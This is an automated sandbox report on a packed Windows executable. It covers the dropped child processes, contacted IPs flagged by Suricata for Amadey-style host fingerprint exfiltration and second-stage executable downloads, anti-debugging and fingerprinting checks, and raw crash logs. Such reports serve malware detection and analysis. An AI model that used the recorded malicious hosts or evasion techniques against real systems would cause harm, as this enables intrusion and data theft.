Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 27, 2024, 12:34 p.m.	July 27, 2024, 12:36 p.m.

Size	1.9MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`e04afeeb6bb46b372bc1d7c2e2f25ead`
SHA256	`71db154390c24f07114784bf363d39dac8f1699c517064327724f83ca4acdfb9`
CRC32	`B019B06F`
ssdeep	`49152:aWzMb/x6nIJ70S13/CgE1/wfjajqg60t3PwB/c2DG7QXc6cnS2:koW136RJ/O+RPwhvDGsXuS`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

random.exe "C:\Users\test22\AppData\Local\Temp\random.exe"
2548
- explorti.exe "C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
  2824
  - d2fed1fe92.exe "C:\Users\test22\AppData\Local\Temp\1000016001\d2fed1fe92.exe"
    3020
  - a0c68cc885.exe "C:\Users\test22\AppData\Local\Temp\1000017001\a0c68cc885.exe"
    812
    - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
      1356
      - firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        2216
        
        crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\dbde6e5a-3000-49e1-b004-9a1dd2dbae29.dmp"
        2360
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\dbde6e5a-3000-49e1-b004-9a1dd2dbae29.dmp"
        2844
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
        232
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        1528
        
        crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\4efec9f7-3e9a-43b8-b4b8-432106fa8532.dmp"
        1792
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\4efec9f7-3e9a-43b8-b4b8-432106fa8532.dmp"
        2292
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
        3068
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        1320
        
        crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\9b020da8-cbfa-4a67-ba46-a8df653b5180.dmp"
        2608
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Local\Temp\\9b020da8-cbfa-4a67-ba46-a8df653b5180.dmp"
        1732
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
        872
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        1784
        
        crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\f28e746d-3501-4d2e-9076-d209e05a2fed.dmp"
        948
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Local\Temp\\f28e746d-3501-4d2e-9076-d209e05a2fed.dmp"
        2444
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
        1976
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        2276
        
        crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\42beb461-1458-4434-946f-8340d1743b2d.dmp"
        2596
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Local\Temp\\42beb461-1458-4434-946f-8340d1743b2d.dmp"
        284
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
        1512
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        1252
        
        crashreporter.exe "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\417673e5-5940-447d-bdd2-3ca89634924d.dmp"
        1220
        
        minidump-analyzer.exe "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\417673e5-5940-447d-bdd2-3ca89634924d.dmp"
        2580
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
        1040
        
        firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        736
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
crash-reports.mozilla.com	A 34.49.45.138 CNAME antenna-prod.socorro.prod.webservices.mozgcp.net	34.49.45.138

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.215.113.16	Active	Moloch
185.215.113.19	Active	Moloch
34.49.45.138	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.16:80 -> 192.168.56.101:49165	2400032	ET DROP Spamhaus DROP Listed Traffic Inbound group 33	Misc Attack
TCP 185.215.113.19:80 -> 192.168.56.101:49164	2400032	ET DROP Spamhaus DROP Listed Traffic Inbound group 33	Misc Attack
TCP 192.168.56.101:49165 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.101:49165	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.215.113.16:80 -> 192.168.56.101:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.16:80 -> 192.168.56.101:49165	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.101:49165	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 185.215.113.16:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.101:49169	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.101:49167 -> 185.215.113.19:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 185.215.113.16:80 -> 192.168.56.101:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.16:80 -> 192.168.56.101:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.16:80 -> 192.168.56.101:49169	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49187 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 185.215.113.19:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49186 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49218 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49217 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49224 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49203 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49226 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49208 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49182 -> 34.49.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameA July 27, 2024, 12:34 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 27, 2024, 12:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 27, 2024, 12:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 27, 2024, 12:35 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 109 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:34 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0
IsDebuggerPresent July 27, 2024, 12:35 p.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll
registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 27, 2024, 12:27 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (6 events)

section	\x00
section	.idata
section
section	lybfcffv
section	emchirzz
section	.taggant

One or more processes crashed (50 out of 285 events)

Time & API	Arguments	Status
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: random+0x3270b9 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 3305657 exception.address: 0x15270b9 registers.esp: 1964112 registers.edi: 0 registers.eax: 1 registers.ebp: 1964128 registers.edx: 23937024 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 e9 0a 05 00 00 81 eb a6 44 exception.symbol: random+0x6cec3 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 446147 exception.address: 0x126cec3 registers.esp: 1964080 registers.edi: 19348730 registers.eax: 28502 registers.ebp: 4009340948 registers.edx: 18874368 registers.ebx: 850460672 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 52 55 e9 00 00 00 00 bd 1b be 37 7b 56 be e1 exception.symbol: random+0x6d47a exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 447610 exception.address: 0x126d47a registers.esp: 1964080 registers.edi: 19323286 registers.eax: 0 registers.ebp: 4009340948 registers.edx: 233705 registers.ebx: 850460672 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 57 56 be 19 c7 ef 7f 81 c6 ff ff ff ff e9 00 exception.symbol: random+0x6eaf5 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 453365 exception.address: 0x126eaf5 registers.esp: 1964076 registers.edi: 19323286 registers.eax: 32509 registers.ebp: 4009340948 registers.edx: 19324511 registers.ebx: 850460672 registers.esi: 3 registers.ecx: 1339256393	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 68 d4 9d 3d 1a 89 0c 24 e9 75 exception.symbol: random+0x6e185 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 450949 exception.address: 0x126e185 registers.esp: 1964080 registers.edi: 19323286 registers.eax: 32509 registers.ebp: 4009340948 registers.edx: 19357020 registers.ebx: 850460672 registers.esi: 3 registers.ecx: 1339256393	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 29 03 00 00 57 bf 82 7b 7c 7f f7 d7 e9 5f exception.symbol: random+0x6e270 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 451184 exception.address: 0x126e270 registers.esp: 1964080 registers.edi: 0 registers.eax: 1259 registers.ebp: 4009340948 registers.edx: 19327788 registers.ebx: 850460672 registers.esi: 3 registers.ecx: 1339256393	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 ce 02 00 00 5d 4d 81 f5 09 51 59 6d 81 c5 exception.symbol: random+0x1f54ff exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2053375 exception.address: 0x13f54ff registers.esp: 1964080 registers.edi: 19359474 registers.eax: 29271 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 60359577 registers.esi: 20909481 registers.ecx: 20955224	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 52 c7 04 24 09 01 43 3b ff 34 24 ff 34 24 8b exception.symbol: random+0x1f4fdc exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2052060 exception.address: 0x13f4fdc registers.esp: 1964080 registers.edi: 713705 registers.eax: 4294940756 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 60359577 registers.esi: 20909481 registers.ecx: 20955224	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 37 01 00 00 68 43 30 7e 7d 5d 45 e9 00 00 exception.symbol: random+0x1f7aa3 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2063011 exception.address: 0x13f7aa3 registers.esp: 1964076 registers.edi: 20936044 registers.eax: 31852 registers.ebp: 4009340948 registers.edx: 25096 registers.ebx: 20931559 registers.esi: 1320207050 registers.ecx: 2116	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 55 89 e5 81 c5 04 00 00 00 81 ed 04 00 00 00 exception.symbol: random+0x1f77c2 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2062274 exception.address: 0x13f77c2 registers.esp: 1964080 registers.edi: 20967896 registers.eax: 31852 registers.ebp: 4009340948 registers.edx: 25096 registers.ebx: 20931559 registers.esi: 1320207050 registers.ecx: 2116	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 ce 04 00 00 55 bd 6f 7f 9a 5f 81 c5 01 00 exception.symbol: random+0x1f75f4 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2061812 exception.address: 0x13f75f4 registers.esp: 1964080 registers.edi: 20939296 registers.eax: 134889 registers.ebp: 4009340948 registers.edx: 0 registers.ebx: 20931559 registers.esi: 1320207050 registers.ecx: 2116	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 81 ea 1f de ed 5e 57 bf 87 77 8f 51 81 cf 91 exception.symbol: random+0x1fe9a4 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2091428 exception.address: 0x13fe9a4 registers.esp: 1964076 registers.edi: 4795928 registers.eax: 30275 registers.ebp: 4009340948 registers.edx: 20964872 registers.ebx: 1380071184 registers.esi: 1320207050 registers.ecx: 1969148396	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb e9 89 02 00 00 5f 89 c8 8b 0c 24 81 c4 04 00 exception.symbol: random+0x1fea1d exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2091549 exception.address: 0x13fea1d registers.esp: 1964080 registers.edi: 0 registers.eax: 30275 registers.ebp: 4009340948 registers.edx: 20968179 registers.ebx: 1380071184 registers.esi: 1320207050 registers.ecx: 1114345	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 56 89 e6 51 89 04 24 b8 exception.symbol: random+0x203645 exception.instruction: in eax, dx exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2111045 exception.address: 0x1403645 registers.esp: 1964072 registers.edi: 0 registers.eax: 1447909480 registers.ebp: 4009340948 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 20972343 registers.ecx: 20	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: random+0x2032e4 exception.address: 0x14032e4 exception.module: random.exe exception.exception_code: 0xc000001d exception.offset: 2110180 registers.esp: 1964072 registers.edi: 0 registers.eax: 1 registers.ebp: 4009340948 registers.edx: 22104 registers.ebx: 0 registers.esi: 20972343 registers.ecx: 20	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 ab 2c 2d 12 01 exception.symbol: random+0x20554e exception.instruction: in eax, dx exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2118990 exception.address: 0x140554e registers.esp: 1964072 registers.edi: 0 registers.eax: 1447909480 registers.ebp: 4009340948 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 20972343 registers.ecx: 10	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: cd 01 eb 00 0f 80 0b 00 00 00 60 0f 8c 00 00 00 exception.symbol: random+0x208c61 exception.instruction: int 1 exception.module: random.exe exception.exception_code: 0xc0000005 exception.offset: 2133089 exception.address: 0x1408c61 registers.esp: 1964040 registers.edi: 0 registers.eax: 1964040 registers.ebp: 4009340948 registers.edx: 1266546642 registers.ebx: 21007696 registers.esi: 31525 registers.ecx: 0	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 68 12 31 ba 56 89 34 24 be 65 a3 ff 6b 05 18 exception.symbol: random+0x209104 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2134276 exception.address: 0x1409104 registers.esp: 1964076 registers.edi: 0 registers.eax: 21008371 registers.ebp: 4009340948 registers.edx: 2130568436 registers.ebx: 67261702 registers.esi: 2130568436 registers.ecx: 21766	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 29 db ff 34 03 ff 34 24 8b 0c 24 83 c4 04 50 exception.symbol: random+0x2094a2 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2135202 exception.address: 0x14094a2 registers.esp: 1964080 registers.edi: 0 registers.eax: 21037811 registers.ebp: 4009340948 registers.edx: 2130568436 registers.ebx: 67261702 registers.esi: 2130568436 registers.ecx: 21766	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 52 57 e9 c9 fc ff ff 89 e1 81 c1 04 00 00 00 exception.symbol: random+0x209ad5 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2136789 exception.address: 0x1409ad5 registers.esp: 1964080 registers.edi: 0 registers.eax: 21037811 registers.ebp: 4009340948 registers.edx: 2130568436 registers.ebx: 4294940712 registers.esi: 2130568436 registers.ecx: 6379	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 55 56 be af d4 7f 6d 81 c6 aa 7c 7b f2 89 f5 exception.symbol: random+0x219b7b exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2202491 exception.address: 0x1419b7b registers.esp: 1964076 registers.edi: 4024371502 registers.eax: 31344 registers.ebp: 4009340948 registers.edx: 6 registers.ebx: 98563 registers.esi: 21076206 registers.ecx: 21074243	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 68 50 3e 7e 4f 89 1c 24 c7 04 24 9b fa b1 7f exception.symbol: random+0x21a1e4 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2204132 exception.address: 0x141a1e4 registers.esp: 1964080 registers.edi: 4024371502 registers.eax: 31344 registers.ebp: 4009340948 registers.edx: 6 registers.ebx: 98563 registers.esi: 21107550 registers.ecx: 21074243	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 57 89 14 24 52 e9 d6 f9 ff ff be 54 1f ef 7f exception.symbol: random+0x21a371 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2204529 exception.address: 0x141a371 registers.esp: 1964080 registers.edi: 4024371502 registers.eax: 31344 registers.ebp: 4009340948 registers.edx: 0 registers.ebx: 98563 registers.esi: 21078970 registers.ecx: 724201	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 52 89 1c 24 89 e3 57 89 e7 81 c7 04 00 00 00 exception.symbol: random+0x21b990 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2210192 exception.address: 0x141b990 registers.esp: 1964080 registers.edi: 4024371502 registers.eax: 21112471 registers.ebp: 4009340948 registers.edx: 0 registers.ebx: 941070452 registers.esi: 21078970 registers.ecx: 0	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 56 51 e9 57 0a 00 00 89 34 24 be 9a 6d c3 4e exception.symbol: random+0x21b81c exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2209820 exception.address: 0x141b81c registers.esp: 1964080 registers.edi: 4024371502 registers.eax: 21112471 registers.ebp: 4009340948 registers.edx: 0 registers.ebx: 4294941896 registers.esi: 2404667984 registers.ecx: 0	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 29 f6 ff 34 0e e9 30 00 00 00 89 24 24 81 04 exception.symbol: random+0x22013f exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2228543 exception.address: 0x142013f registers.esp: 1964072 registers.edi: 4024371502 registers.eax: 29307 registers.ebp: 4009340948 registers.edx: 145870468 registers.ebx: 4294941896 registers.esi: 2404667984 registers.ecx: 21131294	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 57 89 e7 53 55 bd 2f ba e2 7e bb 39 df 0c 1f exception.symbol: random+0x2206d3 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2229971 exception.address: 0x14206d3 registers.esp: 1964072 registers.edi: 4024371502 registers.eax: 1179202795 registers.ebp: 4009340948 registers.edx: 145870468 registers.ebx: 4294941896 registers.esi: 4294940568 registers.ecx: 21131294	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 55 e9 b5 fe ff ff ba 81 23 f1 79 29 d3 5a ff exception.symbol: random+0x225497 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2249879 exception.address: 0x1425497 registers.esp: 1964072 registers.edi: 21151522 registers.eax: 30185 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 4294941828 registers.esi: 4294940568 registers.ecx: 2124349440	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 68 fb c7 f1 15 89 0c 24 52 e9 03 01 00 00 68 exception.symbol: random+0x24446b exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2376811 exception.address: 0x144446b registers.esp: 1964040 registers.edi: 21252730 registers.eax: 28856 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 2437184483 registers.esi: 0 registers.ecx: 3956772712	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 3c 24 bf f8 a2 8d 77 29 fe 8b 3c exception.symbol: random+0x2453a0 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2380704 exception.address: 0x14453a0 registers.esp: 1964036 registers.edi: 21252730 registers.eax: 27981 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 675823385 registers.esi: 21253115 registers.ecx: 3956772712	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 56 be 2a 8c 7f 63 56 f7 14 24 5e 46 4e e9 39 exception.symbol: random+0x24501a exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2379802 exception.address: 0x144501a registers.esp: 1964040 registers.edi: 21252730 registers.eax: 27981 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 675823385 registers.esi: 21281096 registers.ecx: 3956772712	1
__exception__ July 27, 2024, 12:34 p.m.	stacktrace: exception.instruction_r: fb 50 89 2c 24 54 5d e9 2c 02 00 00 f7 14 24 ff exception.symbol: random+0x2452c4 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 2380484 exception.address: 0x14452c4 registers.esp: 1964040 registers.edi: 4294942240 registers.eax: 27981 registers.ebp: 4009340948 registers.edx: 2130566132 registers.ebx: 675823385 registers.esi: 21281096 registers.ecx: 3179896928	1
